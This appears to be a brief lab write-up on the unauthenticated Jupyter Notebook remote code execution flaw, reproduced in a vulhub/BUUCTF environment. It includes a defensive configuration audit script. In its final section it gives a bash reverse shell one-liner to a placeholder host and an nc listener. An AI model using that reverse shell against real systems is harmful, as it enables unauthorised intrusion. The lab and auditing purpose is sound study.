1. Introduction
Jupyter Notebook (previously called IPython notebook) is an interactive notebook that supports running more than 40 programming languages.
If the administrator has not configured a password for Jupyter Notebook, the result is an unauthorized access vulnerability: any visitor can create a console and execute arbitrary Python code and commands.
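The misconfiguration described above can be checked for before a server is exposed. The following Python audit is an added example, not code from the original post or from the Jupyter project; it assumes a notebook version that generates a random token when none is set (4.3 and later), so only an explicitly empty token together with an empty password counts as no authentication. The function names, finding labels and sample inputs are constructed for illustration.

```python
import json
import shlex

# The classic notebook (NotebookApp) and jupyter_server (ServerApp) share these trait names.
APPS = ("NotebookApp", "ServerApp")

def effective_settings(cmdline, config_json="{}"):
    """Merge a JSON config with --App.trait=value overrides (command line wins)."""
    settings = {}
    for app, traits in json.loads(config_json).items():
        if app in APPS:
            settings.update(traits)
    for arg in shlex.split(cmdline):
        if arg == "--allow-root":
            settings["allow_root"] = True
        elif arg.startswith("--") and "=" in arg:
            name, value = arg[2:].split("=", 1)
            app, _, trait = name.rpartition(".")
            if app in APPS or (app == "" and trait in ("ip", "port")):
                settings[trait] = value
    return settings

def audit(cmdline, config_json="{}"):
    """Return finding labels (hypothetical names) for one launch configuration."""
    s = effective_settings(cmdline, config_json)
    findings = []
    # Assumption: an unset token is replaced by a random one; only token='' disables it.
    no_token = s.get("token") == ""
    no_password = not s.get("password")
    if no_token and no_password:
        findings.append("NO_AUTH")
        # With no authentication, an enabled terminal gives any visitor a shell.
        if str(s.get("terminals_enabled", True)).lower() != "false":
            findings.append("TERMINAL_REACHABLE")
    if s.get("ip") in ("0.0.0.0", "*", "::"):
        findings.append("LISTENS_ON_ALL_INTERFACES")
    if s.get("allow_root"):
        findings.append("RUNS_AS_ROOT_ALLOWED")
    return findings

# Constructed sample inputs, not taken from any real deployment.
OPEN = "jupyter notebook --ip=0.0.0.0 --allow-root --NotebookApp.token=''"
HARDENED_CFG = ('{"NotebookApp": {"password": "<hashed-password-placeholder>", '
                '"terminals_enabled": false}}')

if __name__ == "__main__":
    print(audit(OPEN))
    print(audit("jupyter notebook --ip=0.0.0.0", HARDENED_CFG))
```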
2. Reproduce the environment
The environment comes from https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/. For convenience, it can be reproduced directly with the BUUCTF Real environment.
3. Exploitation
Create a new terminal window and, just like that, you have RCE directly.
4. Not much else to say
About the reverse shell:
bash -i >& /dev/tcp/x.x.x.x/8080 0>&1
Then just listen on the other end, like this:
nc -lvp 8080